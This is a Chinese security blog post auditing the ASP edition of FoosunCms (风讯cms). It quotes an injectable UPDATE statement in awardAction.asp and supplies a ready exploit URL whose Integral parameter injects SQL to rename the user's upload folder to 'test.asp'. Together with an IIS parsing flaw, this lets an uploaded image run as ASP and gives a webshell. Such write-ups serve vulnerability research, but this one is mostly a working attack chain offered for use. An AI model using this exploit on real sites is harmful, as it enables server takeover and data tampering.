您的位置 » 首页 » 代码审计 » 代码审计:FoosunCms(风讯cms) asp版sql漏洞 附exp

代码审计:FoosunCms(风讯cms) asp版sql漏洞 附exp

发表于3年前 | 作者: seay | 分类: 代码审计 | 孵化于:2013年12月26日 | 文章热度:5,808 次 全屏阅读

显示不全请点击全屏阅读

FoosunCms的asp版本getshell

在文件\User\award\awardAction.asp中:

Integral=NoSqlHack(request.QueryString("Integral")) 
  
if action="join" then 
  
User_Conn.execute("Insert into FS_ME_User_Prize (prizeid,usernumber,awardID) values("&CintStr(prizeID)&",'"&session("FS_UserNumber")&"',"&CintStr(awardID)&")") 
  
'获得当前参加人数-------------------------------- 
  
User_Conn.execute("Update FS_ME_Users set Integral=(Integral-"&Integral&") where usernumber='"&session("FS_UserNumber")&"'")
请直接无视NoSqlHack,由于sql注入是发生在update语句中,所以我们可以修改表S_ME_Users的任意记录的任意字段信息
webshell还可以用来代替access
我们文件管理中上传个图片文件:
http://192.168.1.101/UserFiles/27015564I69/2013_09_27_01_10_0390446.jpg
UserNumber就是等于27015564I69
通过以上的sql注入漏洞,直接update为test.asp
http://192.168.1.101/User/award/awardAction.asp?action=join&awardID=1&prizeID=1&Integral=1),UserNumber=0x74006500730074002E00610073007000,sex=(1
退出再重新登录

生成test.asp目录,后续上传的文件都会保存在该文件中

利用iis解析漏洞获取webshell

作者:Code_Sec

Tags:

Foosuncms漏洞, 代码审计,

如果您喜欢我的博客,欢迎点击图片定订阅到邮箱填写您的邮件地址,订阅我们的精彩内容: 也可以点击链接【订阅到鲜果】

如果我的想法或工具帮助到了你,也可微信扫下方二维码打赏本人一杯咖啡


来自 Seay互联网安全博客
本文地址:http://www.cnseay.com/3585/
文章版权说明请看置顶文章,尊重作者,转载请以链接形式标明原文地址

马上分享给你的朋友吧~

已经有2个筒子的人留下了脚印...

发表评论

你的大名(必填)

你的邮箱(必填)

评论内容(必填)